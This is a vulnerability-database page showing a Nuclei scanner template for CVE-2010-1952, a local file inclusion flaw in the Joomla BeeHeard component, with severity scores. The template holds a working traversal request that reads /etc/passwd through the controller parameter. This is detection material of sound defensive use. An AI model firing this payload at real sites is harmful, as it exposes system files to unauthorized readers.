Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1952
HistorySep 13, 2021 - 10:11 p.m.

Joomla! Component BeeHeard 1.0 - Local File Inclusion

2021-09-1322:11:22
ProjectDiscovery
github.com
3

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.012 Low

EPSS

Percentile

85.6%

A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1952

info:
  name: Joomla! Component BeeHeard 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12239
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1952
    - http://www.exploit-db.com/exploits/12239
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57845
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-1952
    cwe-id: CWE-22
    epss-score: 0.01242
    epss-percentile: 0.85468
    cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cmstactics
    product: com_beeheard
  tags: cve,cve2010,joomla,lfi,edb,cmstactics

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e07e1103f68db3c4d774c16b7c2b4fc90547e70e1a8a8a752e6308c0465fc15302202e39e604eb2d895d4825c9de4334dd75c03176b3cdf972c69e7e55e9487083ad:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.012 Low

EPSS

Percentile

85.6%

Related for NUCLEI:CVE-2010-1952